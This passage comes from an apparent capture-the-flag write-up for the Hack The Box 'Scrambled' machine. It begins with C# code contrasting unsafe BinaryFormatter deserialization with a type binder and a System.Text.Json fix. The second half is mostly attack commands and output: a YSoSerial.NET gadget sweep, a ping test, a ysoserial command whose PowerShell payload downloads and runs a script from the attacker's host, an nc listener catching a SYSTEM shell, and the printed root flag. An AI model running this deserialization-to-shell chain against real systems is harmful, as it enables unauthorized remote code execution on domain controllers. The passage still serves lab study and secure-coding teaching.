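// Hypothetical stand-in for ScrambleLib's SalesOrder; the real members are not known.
[Serializable]
public class SalesOrder
{
    public string ReferenceNumber { get; set; }
    public int Quantity { get; set; }
}

public static class OrderHandler
{
    // (1) The pattern found in the library: base64 -> BinaryFormatter.Deserialize.
    // BinaryFormatter instantiates whatever types the stream names, so whoever
    // controls the bytes chooses the types and, through gadget chains, the code
    // that runs inside the listener process (on this box: SYSTEM on the DC).
    public static SalesOrder DeserializeUnsafe(string base64)
    {
        byte[] raw = Convert.FromBase64String(base64);
        using (var ms = new MemoryStream(raw))
        {
            var fmt = new BinaryFormatter();
            return (SalesOrder)fmt.Deserialize(ms); // the cast happens after the damage
        }
    }

    // (2) Defence in depth: a SerializationBinder that binds only the one type
    // this message may carry. Gadget chains name other types (delegates,
    // DataSet, AxHost+State, ...) and are refused before being instantiated.
    sealed class SalesOrderOnlyBinder : SerializationBinder
    {
        public override Type BindToType(string assemblyName, string typeName)
        {
            if (typeName == typeof(SalesOrder).FullName)
                return typeof(SalesOrder);
            throw new SerializationException("type '" + typeName + "' is not permitted in an order");
        }
    }

    public static SalesOrder DeserializeWithBinder(string base64)
    {
        byte[] raw = Convert.FromBase64String(base64);
        using (var ms = new MemoryStream(raw))
        {
            var fmt = new BinaryFormatter { Binder = new SalesOrderOnlyBinder() };
            return (SalesOrder)fmt.Deserialize(ms);
        }
    }

    // (3) The real fix: stop using BinaryFormatter. A plain data contract over
    // System.Text.Json never instantiates types named by the input, so there is
    // no gadget surface to reach.
    public static SalesOrder DeserializeJson(string base64)
    {
        byte[] raw = Convert.FromBase64String(base64);
        SalesOrder order = JsonSerializer.Deserialize<SalesOrder>(raw);
        if (order == null || string.IsNullOrEmpty(order.ReferenceNumber))
            throw new InvalidDataException("empty order");
        return order;
    }

    // Port-4411 framing seen in the writeup: "<COMMAND>;<argument>". Validate the
    // framing and size before any decoder sees the bytes, and do not echo the
    // inner exception text (the original listener returned it verbatim).
    const int MaxOrderChars = 4096; // assumed limit

    public static string HandleLine(string line, Func<string, SalesOrder> decode)
    {
        int sep = line.IndexOf(';');
        if (sep < 0) return "ERROR_GENERAL;Malformed request";
        string cmd = line.Substring(0, sep);
        string arg = line.Substring(sep + 1);
        if (cmd != "UPLOAD_ORDER") return "ERROR_GENERAL;Unknown command";
        if (arg.Length == 0 || arg.Length > MaxOrderChars) return "ERROR_GENERAL;Order rejected";
        try
        {
            SalesOrder order = decode(arg);
            return "SUCCESS;" + order.ReferenceNumber; // reply format is an assumption
        }
        catch (Exception ex) when (ex is FormatException        // bad base64
                                || ex is SerializationException // refused by the binder
                                || ex is JsonException
                                || ex is InvalidDataException
                                || ex is InvalidCastException)
        {
            return "ERROR_GENERAL;Order rejected";
        }
    }

    public static void Main()
    {
        // Constructed sample: a legitimate order as JSON, then base64, as a fixed client would send it.
        var order = new SalesOrder { ReferenceNumber = "SO-0001", Quantity = 3 };
        string b64 = Convert.ToBase64String(JsonSerializer.SerializeToUtf8Bytes(order));
        Console.WriteLine(HandleLine("UPLOAD_ORDER;" + b64, DeserializeJson));
        Console.WriteLine(HandleLine("UPLOAD_ORDER;abc", DeserializeJson));
    }
}
```

`DeserializeWithBinder` is worth having only while the wire format cannot be changed: Microsoft's own guidance is that BinaryFormatter cannot be made safe by a binder alone, so `DeserializeJson` (or any serializer that does not take type names from the input) is the end state. The generic `ERROR_GENERAL;Order rejected` reply also removes the oracle that told us, in the session above, exactly which decoding step failed.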

Ysoserial.NET

YSoSerial.NET is a tool that bundles a library of gadgets for exploiting deserialization vulnerabilities in .NET applications. It offers several gadgets, but we do not know which of them might work against this application, so we generate a payload with each one that pings our machine.

[.. snip ..]

== GADGETS ==
        (*)  [Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*)  [This gadget ignores the command parameter and executes the constructor of ExploitClass class] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
        (*)  [Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*)  (supports extra options: use the '--fullhelp' argument to view)
                Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
        (*)  [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*)  [This normally generates the shortest payload] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , DataContractSerializer , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
        (*)  [Tweaked TypeConfuseDelegate gadget to work with Mono]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
        (*)  [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializer (3) , SoapFormatter (2)
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter

Ping Test

We use the following “syntax” to send the payload over a netcat connection, just as observed in Wireshark.

UPLOAD_ORDER;<payload>

After trying the different gadgets we got pings from the machine with seven of them (tab 2).

 π ~/htb/scrambled ❯ sudo tcpdump -i tun1 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun1, link-type RAW (Raw IP), snapshot length 262144 bytes
00:40:15.170285 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 1, length 40
00:40:15.170355 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 1, length 40
00:40:16.180870 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 2, length 40
00:40:16.180886 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 2, length 40
00:40:17.198144 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 3, length 40
00:40:17.198158 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 3, length 40
00:40:18.210003 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 4, length 40
00:40:18.210043 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 4, length 40
AxHostState
ClaimsIdentity
DataSet
RolePrincipal
SessionSecurityToken
SessionViewStateHistoryItem
TextFormattingRunProperties
TypeConfuseDelegate
WindowsIdentity

Shell

With that we generate a new payload to run a Nishang shell.

PS C:\Users\skuld\Downloads\ysoserial-1.34\Release> ./ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.207/shell.ps1')"
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
PS C:\Users\skuld\Downloads\ysoserial-1.34\Release>

After sending the payload we got a shell as administrator and our root.txt flag.

 π ~/htb/scrambled ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.207] from scramblecorp.com [10.10.11.168] 58472
Windows PowerShell running as user DC1$ on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd C:\users\administrator\desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       15/07/2022     05:56             34 root.txt


PS C:\users\administrator\desktop> cat root.txt
d4e301b8c323e25911c44ce30bcbe5b8
PS C:\users\administrator\desktop>
Written by sckull (Dany Sucuc)
RedTeamer & Pentester wannabe